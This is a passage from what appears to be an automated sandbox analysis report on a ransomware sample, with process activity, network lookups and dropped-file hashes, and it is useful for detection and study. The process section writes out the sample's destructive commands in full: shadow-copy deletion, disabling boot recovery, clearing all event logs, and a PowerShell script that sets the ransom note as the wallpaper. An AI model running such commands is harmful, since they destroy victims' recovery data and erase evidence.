PID 18180 wrote to memory of 17876 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 18180 wrote to memory of 17876 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 17600 wrote to memory of 17588 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 17600 wrote to memory of 17588 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 16316 wrote to memory of 16292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 16316 wrote to memory of 16292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 16020 wrote to memory of 15980 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 16020 wrote to memory of 15980 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 16020 wrote to memory of 15980 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 16020 wrote to memory of 15980 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 16020 wrote to memory of 15980 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 16020 wrote to memory of 15980 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 16020 wrote to memory of 15980 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 16020 wrote to memory of 15980 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 16020 wrote to memory of 15980 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 16020 wrote to memory of 15980 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 16020 wrote to memory of 15980 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\sex.exe

"C:\Users\Admin\AppData\Local\Temp\sex.exe"

C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr

"C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr" /S

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1966767074.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff15f3cc40,0x7fff15f3cc4c,0x7fff15f3cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff15f3cc40,0x7fff15f3cc4c,0x7fff15f3cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff15f3cc40,0x7fff15f3cc4c,0x7fff15f3cc58

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr

MD5 e27b5291c8fb2dfdeb7f16bb6851df5e
SHA1 40207f83b601cd60905c1f807ac0889c80dfe33f
SHA256 ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f
SHA512 2ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a

memory/2040-4-0x00007FF6EA0D0000-0x00007FF6EA1EE000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

MD5 c92c2b70fb37f84aab38412ad9226aa8
SHA1 14f2e9a83285612d0a7b2c83b8f89bccfde6c154
SHA256 d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f
SHA512 04f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848

memory/4748-9875-0x000001D144120000-0x000001D144142000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q4eydiuq.3ew.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 186ccc6761714f7e88de1fff069b95fb
SHA1 c7dec1fff5e2f359cccf94875265f96757865b34
SHA256 abb5c7113a03fa5d3a4d6d25007f875d5189c85054252a03a3c9d2cc64a5f59e
SHA512 5f346abd0068d56df1bc7236a8f8ae6e0397cd35c7e8a6554f90724bc4936ed6a1f127aef797391d34ab458ba9ff3337bade05334155aae7473e6c463b0499c9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\92ad9d1d-8b78-4c1f-bd9b-f81bddda6d98.dmp

MD5 343250bbc86664dedf8a6814f9619f14
SHA1 065b4a3a3354fa5f3c7b978b8f55cb5f283c943d
SHA256 f9c7bf5571d7e6bd3d6f36bb0acf4f461579f0dda2955a0c4c8813f05fa6f14c
SHA512 778ecc2fe80b1c423ed5624db5f7faf7942eb969b9a779a8016605af81129f7e22df313f731f1e88372d947ffe3bfb4f43ce8d212530830869c4ad1cbc602a27

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\metadata

MD5 768c9848465dd849711ba175e0144cc4
SHA1 5fd77917122772937ddcba18ee82dd95cb53e27a
SHA256 f4b2139e7d814fb246b7a73c88801c6f1b57adec2a531d27e181e66e4b1b6c39
SHA512 cc61faf45cef271ebb6438c1328b04cba2b721d5ccdcd0d569d09543c0ca083e182ca2142f1b748216ff3a0d025579545375c013acc318de2f131ed10a9df57f

C:\Program Files\Google\Chrome\Application\debug.log

MD5 6a484274a849c4b1231525e44b6a3af2
SHA1 795a62d8a5e807a6c90335d30d414134ab13103b
SHA256 eb125cf17d3e33a789051939c5f3765354e33074dc6fab3849ee5230a94347e8
SHA512 34225f1d1d52a421e7dbec10bbe2d21653054813cb5bf0bd304c411426c30c7aea546ddf802732dc09e761a7bb4849d94f8cbe6285c75b8530f35eecb8cb519c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\fcfac577-a710-418c-9326-23fc286298e4.dmp

MD5 60e5b9806d453f445fad59225a0f55f9
SHA1 f3cc2d44a67ce8e8caacd18832b11bf9c061beee
SHA256 a4048171db571f6fdffa8c56fb42b6e1fd2e2bf1a8bf1f33b2479c65926ab691
SHA512 b673eac4007fd1b7f9c587b6d17943464cfbbd2e45cc65b11b243ead765605e4d52844fe1541b5e09ea26cc2d0945999333f3cae65ff4371e9ee9e06af435a6b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\metadata

MD5 2f60b20f6e484b17f66d76e20b55abef
SHA1 c488d0e3a69bb506b25ea14e7955b6a3af2a2d14
SHA256 5f6bcd98baf91f67af7dcf9d7b784ecb96abca4fde1fb4c9430b9491f7ade68d
SHA512 80653ef70d511dd1715e352f00000bdb3040f42054e91796c07b6ed17b768b305da76a5c17dbba8fd465d5bbfdfa34afe0e0cc032cba63f3596cec963ae38a04

C:\Program Files\Google\Chrome\Application\debug.log

MD5 dd0f4e6644e79ee7f43a07e06fe01ab0
SHA1 9865cb35704a7eb70c4f3d661830c6049fb0705c
SHA256 6f26e9a50be1f98fc4e4dd60712facc61757623d661cdc3663c7002a3c14a605
SHA512 6b9f468fa1b56691d5a5681f002e32cbf9ed4a53b770a87fda4c281695ee3e56309a9d2bd08ff96c4baff8eeefacd37ecd8016ecde188c577c5a4613f904afab